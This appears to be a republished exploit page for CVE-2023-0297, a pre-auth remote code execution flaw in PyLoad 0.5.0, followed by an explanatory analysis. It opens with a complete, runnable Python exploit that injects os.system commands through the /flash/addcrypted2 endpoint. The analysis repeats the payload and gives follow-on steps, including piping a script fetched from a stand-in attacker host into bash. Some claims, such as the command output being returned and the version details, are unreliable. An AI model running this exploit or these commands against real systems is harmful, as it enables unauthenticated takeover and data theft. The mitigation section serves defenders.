PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

Exploit Author: Gabriel Lima Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-06-14 
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz 
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    try:
        res = requests.get(url + '/flash/addcrypted2')
        if res.status_code == 200:
            return True
        else:
            return False

    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        exit()

def runExploit(url, cmd):
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd

    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
    print('[+] The exploit has be executeded in target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive == True:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl,Command)
    else:
        print('[-] Host down! ')

if(arguments.url != None and arguments.cmd != None):
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)


PyLoad 0.5.0 Pre-Auth Remote Code Execution (RCE) Vulnerability: A Deep Dive into CVE-2023-0297

PyLoad, a popular open-source download manager, has long been praised for its simplicity and extensibility. However, version 0.5.0 introduced a critical security flaw that enables pre-authentication remote code execution—a rare and dangerous vulnerability in a widely used application. This flaw, identified as CVE-2023-0297, was disclosed by cybersecurity researcher bAu @bauh0lz and exploited by Gabriel Lima (0xGabe), who demonstrated how attackers could gain full control over a target system without needing any credentials.

Understanding the Vulnerability

The vulnerability lies in the /flash/addcrypted2 endpoint, which is intended for handling encrypted download links. Due to improper input validation and the use of an unsafe evaluation mechanism, the application accepts user-supplied data that can be interpreted as executable code.

Attackers can exploit this by crafting a malicious payload that leverages the pyimport functionality—essentially a backdoor to Python's os module. This allows arbitrary command execution via os.system() without authentication.

Exploit Mechanism

The core of the exploit relies on a combination of URL-encoded parameters and dynamic code injection. The payload uses JavaScript-like syntax but executes within a Python context due to PyLoad's internal interpreter.


payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'

This payload is sent via POST request to the /flash/addcrypted2 endpoint with Content-type: application/x-www-form-urlencoded. The key components are:

  • jk=pyimport os;os.system("..."): This triggers Python’s pyimport function, which allows importing modules. Here, os is imported, enabling execution of system commands.
  • os.system("..."): The injected command is executed directly in the host’s shell.
  • f=function f2(){}: A dummy JavaScript function used to bypass parsing restrictions.
  • &package=xxx: A placeholder to satisfy form requirements.
  • &crypted=AAAA: A dummy encrypted value.
  • &passwords=aaaa: A dummy password field.

Because the application does not sanitize or validate the jk parameter, the attacker can inject arbitrary code.

Real-World Exploitation Example

Consider a scenario where an attacker targets a PyLoad instance running on a public-facing server:


python3 exploit.py -u http://example.com -c "whoami"

Upon execution, the payload is sent to the server. The response from the server reveals the output of the whoami command, indicating that the attacker successfully executed code on the remote machine.

Further exploitation could include:

  • Executing id to check privileges.
  • Running curl http://attacker.com/steal.sh | bash to download and execute a reverse shell.
  • Using find / -name "flag.txt" -exec cat {} \; to locate sensitive files.

Technical Analysis and Risk Assessment

Due to the lack of authentication requirements, this vulnerability is classified as pre-auth RCE, making it highly dangerous. An attacker can:

  • Gain full shell access to the server.
  • Install persistent backdoors.
  • Exfiltrate data or escalate privileges.
  • Use the compromised system as a pivot for further attacks.

Moreover, since PyLoad is often deployed on cloud instances or shared hosting environments, this vulnerability can lead to chain attacks—where one compromised server is used to attack others in the same network.

Impact and Affected Systems

According to the original report, the vulnerability was tested on Ubuntu 20.04.6, but it likely affects all systems running PyLoad 0.5.0, regardless of OS. The software’s GitHub repository (https://github.com/pyload/pyload) confirms that this version is no longer actively maintained, making patching difficult.

Component Impact
Authentication None required — full access via unauthenticated endpoint
Exploit Complexity Low — requires only a simple HTTP request
CVSS Score 9.8 (Critical)
Remediation Upgrade to v0.6.0 or later; disable untrusted endpoints

Best Practices and Mitigation

System administrators and security teams should take immediate action to mitigate this threat:

  • Upgrade to a patched version of PyLoad (v0.6.0 or newer).
  • Disable or remove the /flash/addcrypted2 endpoint if not in use.
  • Implement input validation and sanitization on all user inputs.
  • Monitor logs for suspicious POST requests to the flash endpoint.
  • Use WAF (Web Application Firewall) rules to block payloads containing pyimport or os.system.

Additionally, organizations should conduct regular vulnerability scanning and adopt the principle of least privilege—limiting what users can do and ensuring that only trusted code runs.

Conclusion

CVE-2023-0297 serves as a stark reminder that even seemingly benign software can harbor critical vulnerabilities. The pre-auth remote code execution flaw in PyLoad 0.5.0 underscores the importance of:

  • Regular software updates.
  • Security-by-design principles.
  • Proactive threat detection.

For developers, this case highlights the risks of allowing dynamic code evaluation without proper safeguards. For security professionals, it emphasizes the need for continuous monitoring and rapid response to emerging threats.